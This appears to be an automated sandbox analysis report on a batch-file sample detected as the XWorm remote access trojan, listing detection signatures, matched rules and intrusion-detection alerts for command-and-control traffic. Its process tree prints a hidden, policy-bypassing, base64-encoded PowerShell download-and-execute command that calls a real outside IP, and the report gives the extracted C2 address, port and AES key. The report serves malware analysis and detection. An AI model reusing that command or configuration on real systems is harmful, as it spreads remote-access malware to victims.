Windows
Analysis Report
92.255.85.2.bat
Overview
General Information
Detection
XWorm
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7732 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\92.25 5.85.2.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7872 cmdline:
powershell -Executio nPolicy By pass -NoPr ofile -Win dowStyle H idden -e J ABjAD0ATgB lAHcALQBPA GIAagBlAGM AdAAgAE4AZ QB0AC4AVwB lAGIAQwBsA GkAZQBuAHQ AOwBJAEUAW AAgACQAYwA uAEQAbwB3A G4AbABvAGE AZABTAHQAc gBpAG4AZwA oACcAaAB0A HQAcAA6AC8 ALwA5ADIAL gAyADUANQA uADgANQAuA DIALwBhAC4 AbQBwADQAJ wApAA== MD5: 04029E121A0CFA5991749937DD22A1D9) csc.exe (PID: 2168 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\strztq ek\strztqe k.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) cvtres.exe (PID: 5860 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESBA33.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\str ztqek\CSC6 90A104BD3B A4E08BCA82 F5F59FD8A8 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) MSBuild.exe (PID: 7384 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{
"C2 url": [
"92.255.85.2"
],
"Port": 4372,
"Aes key": "P0WER",
"SPL": "<Xwormmm>",
"Install file": "USB.exe",
"Version": "XWorm V5.66"
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
Click to see the 13 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:32.921009+0100 | 2018581 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:31.629098+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:32.921009+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:31.629098+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
2025-03-26T04:16:32.921009+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:31.433972+0100 | 2860704 | 1 | A Network Trojan was detected | 192.168.2.4 | 49717 | 92.255.85.2 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:43.466077+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:16:49.514320+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:01.479932+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:13.451658+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:13.650572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:25.425533+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:37.392026+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:43.466619+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:44.856662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.030635+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.227154+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:50.421592+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:54.840066+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:17:55.283537+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:07.090159+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:10.733214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:10.936247+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:13.464004+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:16.467874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:26.591249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:35.591181+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:36.715860+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:36.913478+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:42.968290+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:43.465214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:54.953471+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:18:57.312199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:02.653237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:07.043940+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:13.467848+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:16.762696+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:18.887479+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:19.083128+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:24.279149+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:26.247568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:34.544073+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:34.743055+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:37.888014+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:39.795628+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:40.235872+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:43.464364+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:45.185013+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:45.381022+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:50.684969+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:19:50.881516+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:02.715303+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:13.465253+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:13.967983+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:15.060706+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:19.015072+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:25.631596+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:27.590423+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
2025-03-26T04:20:31.899017+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:49.517689+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:01.482824+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:13.453838+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:25.428914+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:37.393662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:44.861673+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.227234+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.421926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:50.666373+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:54.844212+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:17:55.285057+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:07.092219+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:10.937363+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:11.179489+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:16.469414+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:26.594039+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:35.596080+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:36.913554+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:37.164279+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:42.969926+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:54.956480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:18:57.317866+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:02.678853+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:07.045934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:16.764512+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:19.083288+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:19.318764+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:24.281096+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:26.249496+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:34.743146+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:34.937960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:37.889843+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:39.800308+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:40.237882+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:45.381284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:45.617888+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:50.881600+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:19:51.136493+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:02.717007+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:13.972424+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:15.062352+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:19.016686+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:25.634097+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:27.592172+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
2025-03-26T04:20:31.900002+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:16:43.466077+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.85.2 | 4372 | 192.168.2.4 | 49722 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-26T04:18:35.395014+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49722 | 92.255.85.2 | 4372 | TCP |
- • AV Detection
- • Compliance
- • Networking
- • E-Banking Fraud
- • System Summary
- • Data Obfuscation
- • Persistence and Installation Behavior
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Lowering of HIPS / PFW / Operating System Security Settings
- • Stealing of Sensitive Information
- • Remote Access Functionality
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |